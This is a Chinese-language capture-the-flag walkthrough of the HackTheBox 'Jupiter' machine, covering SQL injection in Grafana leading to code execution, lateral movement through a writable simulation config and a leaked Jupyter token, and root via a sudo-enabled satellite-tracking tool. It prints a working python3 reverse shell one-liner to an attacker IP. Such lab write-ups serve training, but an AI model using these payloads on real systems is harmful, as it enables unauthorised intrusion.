HackTheBox - Medium - Linux - Jupiter

Jupiter

Jupiter 是一台中等难度的 Linux 机器,它有一个使用 PostgreSQL 数据库的 Grafana 实例,该数据库在权限上过度扩展,容易受到 SQL 注入的影响,因此容易受到远程代码执行的影响。一旦站稳脚跟,就会注意到一个名为 Shadow 的实用程序,这是一种科学实验工具,可以简化对真实网络应用程序的评估,但其配置文件的权限配置错误。然后,通过查看与 Jupyter Notebook 关联的日志文件来实现横向移动,这些日志文件包含次要用户的令牌。获得对此用户的访问权限后,可以通过滥用卫星跟踪系统二进制文件来实现权限提升,该二进制文件可能由次要用户使用“sudo”权限执行。


外部信息搜集

端口扫描

循例nmap

HackTheBox - Medium - Linux - Jupiter_第1张图片

Web枚举

访问80跳转到了jupiter.htb,加入/etc/hosts

vhost扫描

ffuf扫出一个vhost

HackTheBox - Medium - Linux - Jupiter_第2张图片

kiosk子域

HackTheBox - Medium - Linux - Jupiter_第3张图片

SQL注入

我在查看bp日志的时候发现了这个包,里面包含了非常显眼的sql查询语句

HackTheBox - Medium - Linux - Jupiter_第4张图片

把请求给到repeater,使用version()查询一下,发现执行成功

HackTheBox - Medium - Linux - Jupiter_第5张图片

接下啦就不再需要脑子了,我们可以通过sqlmap一键尝试RCE

file

正如所料,是DBA

HackTheBox - Medium - Linux - Jupiter_第6张图片

来个常规python3 reverse shell payload

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' &

payload最后的&不能少,否则shell可能会被杀死

getshell

HackTheBox - Medium - Linux - Jupiter_第7张图片

本地横向移动 -> juno

传个pspy

HackTheBox - Medium - Linux - Jupiter_第8张图片

2023/12/22 07:24:01 CMD: UID=1000  PID=2159   | 
2023/12/22 07:24:01 CMD: UID=1000  PID=2160   | rm -rf /dev/shm/shadow.data 
2023/12/22 07:24:01 CMD: UID=1000  PID=2161   | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml 
2023/12/22 07:24:01 CMD: UID=1000  PID=2164   | sh -c lscpu --online --parse=CPU,CORE,SOCKET,NODE 
2023/12/22 07:24:01 CMD: UID=1000  PID=2165   | lscpu --online --parse=CPU,CORE,SOCKET,NODE 
2023/12/22 07:24:01 CMD: UID=1000  PID=2170   | 
2023/12/22 07:24:02 CMD: UID=1000  PID=2171   | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml 
2023/12/22 07:24:02 CMD: UID=1000  PID=2173   | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml 
2023/12/22 07:24:02 CMD: UID=1000  PID=2175   | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml 

我们可以看到/home/juno/.local/bin/shadow这个应用似乎正将yml文件名作为输入并运行

这个文件我们有权读写

HackTheBox - Medium - Linux - Jupiter_第9张图片

当我查看该文件时,接下来要做的事情便不再需要解释了

HackTheBox - Medium - Linux - Jupiter_第10张图片

python3 payload

HackTheBox - Medium - Linux - Jupiter_第11张图片

发现它确实执行了,但似乎执行没成功,反正我没get到shell

换种方法,直接写入ssh key

HackTheBox - Medium - Linux - Jupiter_第12张图片

这次也执行了

HackTheBox - Medium - Linux - Jupiter_第13张图片

登一下ssh看看有没有成功

HackTheBox - Medium - Linux - Jupiter_第14张图片

本地横向移动 -> jovian

我看到当前用户具有另一个组,下意识查看那个组是否具有某些文件或目录

HackTheBox - Medium - Linux - Jupiter_第15张图片

当我查看其中一个日志文件后,我发现本地8888端口的http服务应该就是jupyter

HackTheBox - Medium - Linux - Jupiter_第16张图片

ssh做个端口转发

file

通过日志文件里的正确token,我们能够登录进去

HackTheBox - Medium - Linux - Jupiter_第17张图片

进入这个文件

HackTheBox - Medium - Linux - Jupiter_第18张图片

在这里我们能够运行python代码

直接来个python shellcode

HackTheBox - Medium - Linux - Jupiter_第19张图片

nc

HackTheBox - Medium - Linux - Jupiter_第20张图片

本地权限提升

sudo -l

HackTheBox - Medium - Linux - Jupiter_第21张图片

通过strace发现它会读取/tmp/config.json,但由于不清楚它的配置究竟是怎么样的,所以即使我们自己创建了文件也没有意义

HackTheBox - Medium - Linux - Jupiter_第22张图片

find

HackTheBox - Medium - Linux - Jupiter_第23张图片

在那个目录下有我们想要的config.json

HackTheBox - Medium - Linux - Jupiter_第24张图片

{
	"tleroot": "/tmp/tle/",
	"tlefile": "weather.txt",
	"mapfile": "/usr/local/share/sattrack/map.json",
	"texturefile": "/usr/local/share/sattrack/earth.png",
	
	"tlesources": [
		"http://celestrak.org/NORAD/elements/weather.txt",
		"http://celestrak.org/NORAD/elements/noaa.txt",
		"http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle"
	],
	
	"updatePerdiod": 1000,
	
	"station": {
		"name": "LORCA",
		"lat": 37.6725,
		"lon": -1.5863,
		"hgt": 335.0
	},
	
	"show": [
	],
	
	"columns": [
		"name",
		"azel",
		"dis",
		"geo",
		"tab",
		"pos",
		"vel"
	]
}

将config.json复制到/tmp

file

运行看看效果

HackTheBox - Medium - Linux - Jupiter_第25张图片

主要关注这句话

tleroot does not exist, creating it: /tmp/tle/

我们可以将tleroot改到/root/.ssh,然后它就会去请求tlesources的文件复制到tleroot,我们可以指定ssh public key

编辑/tmp/config.json

HackTheBox - Medium - Linux - Jupiter_第26张图片

再次执行

HackTheBox - Medium - Linux - Jupiter_第27张图片

ssh登root

HackTheBox - Medium - Linux - Jupiter_第28张图片

root flag 还在老地方

你可能感兴趣的:(HackTheBox,HackTheBox,网络安全,Web,Linux渗透测试,配置错误)